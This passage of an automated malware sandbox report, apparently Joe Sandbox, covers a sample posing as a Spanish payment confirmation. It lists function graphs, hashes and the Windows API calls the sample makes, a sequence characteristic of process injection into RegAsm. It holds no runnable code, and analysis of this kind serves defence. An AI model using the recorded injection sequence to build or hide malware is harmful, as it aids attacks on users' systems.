                                                control_flow_graph 198 2d686e4-2d6a021 201 2d6a023-2d6a02f 198->201 202 2d6a031-2d6a06a WriteProcessMemory 198->202 201->202 203 2d6a073-2d6a09b 202->203 204 2d6a06c-2d6a072 202->204 204->203
                                                APIs
                                                • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 02D6A05D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                • Opcode ID: d435a2b26fcc3243844192d4b64be37157603a7e24cd22fc0930394b2927cc03
                                                • Instruction ID: ae11b84459aed8d9f14e3d7a70eb17d8a874c9bdc4c59527b13d5ac835a92a44
                                                • Opcode Fuzzy Hash: d435a2b26fcc3243844192d4b64be37157603a7e24cd22fc0930394b2927cc03
                                                • Instruction Fuzzy Hash: E421F5759003499FCB10DF9AC889BEEBBF5FB48310F50842AE958A7341D778A944CBA4
                                                Function 02D686C0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 207 2d686c0-2d69ed4 ReadProcessMemory 210 2d69ed6-2d69edc 207->210 211 2d69edd-2d69f05 207->211 210->211
                                                APIs
                                                • ReadProcessMemory.KERNEL32(?,?,?,?,00010002), ref: 02D69EC7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                • Opcode ID: 9cfdc4e79d4a5e4aec1a87ab1e83c9dfb4193fe1a9ed9a96505cd6af5d48c7f5
                                                • Instruction ID: 4f311cedce721636f3f92eb78e37e62321c81ea506b3d849e9298900c4b6810c
                                                • Opcode Fuzzy Hash: 9cfdc4e79d4a5e4aec1a87ab1e83c9dfb4193fe1a9ed9a96505cd6af5d48c7f5
                                                • Instruction Fuzzy Hash: 0221E2B6901349DFCB10DF9AD984BDEBBF5FB48310F10842AE958A7351D379A944CBA0
                                                Function 02D686F0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 223 2d686f0-2d69dcc 226 2d69dce-2d69dd6 223->226 227 2d69dd8-2d69e04 Wow64SetThreadContext 223->227 226->227 228 2d69e06-2d69e0c 227->228 229 2d69e0d-2d69e35 227->229 228->229
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(02FE95E4,00000000), ref: 02D69DF7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 03d67e47a09ca97dca8d8f0ad598e87d085ed5603ed24254574d34dc6e518f98
                                                • Instruction ID: e3daec0b733e29f4178e4cede1c93f3602b28857e154dc57a3d30dad13d39a71
                                                • Opcode Fuzzy Hash: 03d67e47a09ca97dca8d8f0ad598e87d085ed5603ed24254574d34dc6e518f98
                                                • Instruction Fuzzy Hash: 73213572D002199BCB10CF9AC5897EEFBF4BB48210F10816AD818B7341D378A904CFE0
                                                Function 02D686A8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 214 2d686a8-2d69dcc 217 2d69dce-2d69dd6 214->217 218 2d69dd8-2d69e04 Wow64SetThreadContext 214->218 217->218 219 2d69e06-2d69e0c 218->219 220 2d69e0d-2d69e35 218->220 219->220
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(02FE95E4,00000000), ref: 02D69DF7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 965250df859eb263beded7fe7e285b6f5080c33b6c26a3d0d09f6411d3c754f9
                                                • Instruction ID: d86aded25f941d28a1fdc0cfa882edfe47d17d7b9077680c599176721774e6de
                                                • Opcode Fuzzy Hash: 965250df859eb263beded7fe7e285b6f5080c33b6c26a3d0d09f6411d3c754f9
                                                • Instruction Fuzzy Hash: 1F213572D002199BCB10CF9AC5897EEFBF4BB48210F10812AD818B7341D378A904CFE0
                                                Function 02D686D8 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 232 2d686d8-2d69f90 VirtualAllocEx 235 2d69f92-2d69f98 232->235 236 2d69f99-2d69fb6 232->236 235->236
                                                APIs
                                                • VirtualAllocEx.KERNEL32(?,?,?,?,00010002), ref: 02D69F83
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 5b173898b74a73c6fa5b8c24381181786d760ebd4e6281f61269e10991a61070
                                                • Instruction ID: a4a86809607523bb1556c5780df1953a90bf015a9c13e1986eb2422c2c3b5d61
                                                • Opcode Fuzzy Hash: 5b173898b74a73c6fa5b8c24381181786d760ebd4e6281f61269e10991a61070
                                                • Instruction Fuzzy Hash: D11104B69043499FCB20DF9AC988BDEBBF5FB88310F108459E919A7351C775A944CFA0
                                                Function 02D68708 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 239 2d68708-2d6a11c ResumeThread 242 2d6a125-2d6a142 239->242 243 2d6a11e-2d6a124 239->243 243->242
                                                APIs
                                                • ResumeThread.KERNEL32(02FE95E4), ref: 02D6A10F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: f120fe3eae7febda46c1de1d6e0810515b7ef8af2313164b0763e026177c355e
                                                • Instruction ID: b9eed4c10a68240eedbf65aff691c7906b209e4010d4ff57790d9af84b014f34
                                                • Opcode Fuzzy Hash: f120fe3eae7febda46c1de1d6e0810515b7ef8af2313164b0763e026177c355e
                                                • Instruction Fuzzy Hash: CC1125B19043498FDB20DF9AC588BDEFBF4EB48320F20845AD959A7300D778A944CFA5
                                                Function 0120D76D Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 384 120d76d-120d78d 385 120d7dd-120d7e5 384->385 386 120d78f-120d79a 384->386 385->386 387 120d7d2-120d7d9 386->387 388 120d79c-120d7aa 386->388 387->388 392 120d7db 387->392 391 120d7b0 388->391 393 120d7b3-120d7bb 391->393 392->393 394 120d7cb-120d7d0 393->394 395 120d7bd-120d7c5 393->395 394->395
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460443786.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_120d000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c685e5efd296e7ab85ebcc8b44d534ec58c22283ad7a62f5ca645b37632b38ee
                                                • Instruction ID: 3635c077e57c3f188c5be0004f614c95b40b7531bd21c55a6978523f8e95cd68
                                                • Opcode Fuzzy Hash: c685e5efd296e7ab85ebcc8b44d534ec58c22283ad7a62f5ca645b37632b38ee
                                                • Instruction Fuzzy Hash: DE012B3101A3889BF7264AD5CC80767FBD8EF41634F14C52DEE090A6D3C3789840CA72
                                                Function 0120D76C Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460443786.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_120d000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3b3712d0d135c7cd5c31fbaac5cee24e88b30ec4c9804220bb16a3c3723e8e9a
                                                • Instruction ID: 7baf059c553b0aefcc8eb9316d854ca4b735d09b5dfe18debaf3615cd5303997
                                                • Opcode Fuzzy Hash: 3b3712d0d135c7cd5c31fbaac5cee24e88b30ec4c9804220bb16a3c3723e8e9a
                                                • Instruction Fuzzy Hash: 9EF0C2324093889FEB258A49D884B63FFE8EB41624F18C55AEE084B2D7C2789840CB71

                                                Non-executed Functions

                                                Function 02D615B0 Relevance: 2.6, Strings: 2, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: L$z
                                                • API String ID: 0-3355038770
                                                • Opcode ID: fa9efc7a6f230bd0b806e837f838d589a4f9da3140df218538d2cbfadf471bb2
                                                • Instruction ID: 24de6b7f186988fe36214ee43eb0489909c2b29e8841f1cc70b3e99c2628bceb
                                                • Opcode Fuzzy Hash: fa9efc7a6f230bd0b806e837f838d589a4f9da3140df218538d2cbfadf471bb2
                                                • Instruction Fuzzy Hash: E14140B1E016588BEB5CCF6BCD4479EFAF7AFC9200F04C1BA850DAA255EB7049858E15
                                                Function 02D61252 Relevance: .1, Instructions: 149COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b67c8b97ae3be82dab9b7452c30736b5cb43175434dacbb5b1207022f7ef788e
                                                • Instruction ID: 4ddd48f1927373f132f86aad3c02194a120441aa2031ccab0eb2554e6835e6e8
                                                • Opcode Fuzzy Hash: b67c8b97ae3be82dab9b7452c30736b5cb43175434dacbb5b1207022f7ef788e
                                                • Instruction Fuzzy Hash: C3515E749012098FDB99DFB9E8907AE7BF6BBC9700F00C529C0159F2AADB705809EF51
                                                Function 02D61260 Relevance: .1, Instructions: 145COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1460765606.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_2d60000_Confirmaci#U00f3n de pago_shrunk.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 41d27f82e5a26dc462d6b8ab7704c1db84be693fcb8a01cbe8fd4a0e9004f4ef
                                                • Instruction ID: cb2e1e3efcae339b6a078c7f56ae88f94cc36cc46a7ef6bdb63a2a54502cbe7d
                                                • Opcode Fuzzy Hash: 41d27f82e5a26dc462d6b8ab7704c1db84be693fcb8a01cbe8fd4a0e9004f4ef
                                                • Instruction Fuzzy Hash: DD516F749016098FDB59DFB9E8907AE7BF6BBC9700F00C529C0169B3AADB705809EF51

                                                Execution Graph

                                                Execution Coverage:12.7%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:4
                                                Total number of Limit Nodes:0
                                                execution_graph 10433 30dfdba 10434 30dfe02 10433->10434 10436 30dfe09 10433->10436 10435 30dfe5a CallWindowProcW 10434->10435 10434->10436 10435->10436

                                                Executed Functions

                                                Function 030DF658 Relevance: 2.1, APIs: 1, Instructions: 646COMMON
                                                Download Yara Rule
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 030DFE81
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2696623087.00000000030D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_30d0000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: b6244061b5df787f00db60ab66b4cba193b21c5a063ef2052a093824331a7f6f
                                                • Instruction ID: 723dfb777bb543a72f4770c7b674a8c1c4303766a31bdcf8fd6d8a3bd4f7f4ad
                                                • Opcode Fuzzy Hash: b6244061b5df787f00db60ab66b4cba193b21c5a063ef2052a093824331a7f6f
                                                • Instruction Fuzzy Hash: 78423734A01306CFDB64CB68C584B9DBBF6EB49314F58C4A9D40AAB365D735EC81CB51
                                                Function 0148D030 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2696230347.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_148d000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eac3d5fba33a8dbc56c242b603d4641323f9af9afa5dd129d65a22d11228401e
                                                • Instruction ID: 29813f0d48f14f966396b57da1cea5a0b6f0392039c0c8af0c3678bdbffc339b
                                                • Opcode Fuzzy Hash: eac3d5fba33a8dbc56c242b603d4641323f9af9afa5dd129d65a22d11228401e
                                                • Instruction Fuzzy Hash: A32137B1905304DFDB15EF54D9C0B1ABB61FB85318F24C56ED80A4B3A6C33AD847CA62
                                                Function 0148D006 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2696230347.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_148d000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 781e332f723c96c7689550f51fa5439940b6e95f0cbf444f2339fbf5d3ccf632
                                                • Instruction ID: f7ae4521cf60b7d3e82d5c1046c790a91e61393bf0bd788180dd450169f2f82d
                                                • Opcode Fuzzy Hash: 781e332f723c96c7689550f51fa5439940b6e95f0cbf444f2339fbf5d3ccf632
                                                • Instruction Fuzzy Hash: 5221687140A3C49FCB03DB64D990715BF71AB47214F29C5DBC8898F2A7C23A984ACB62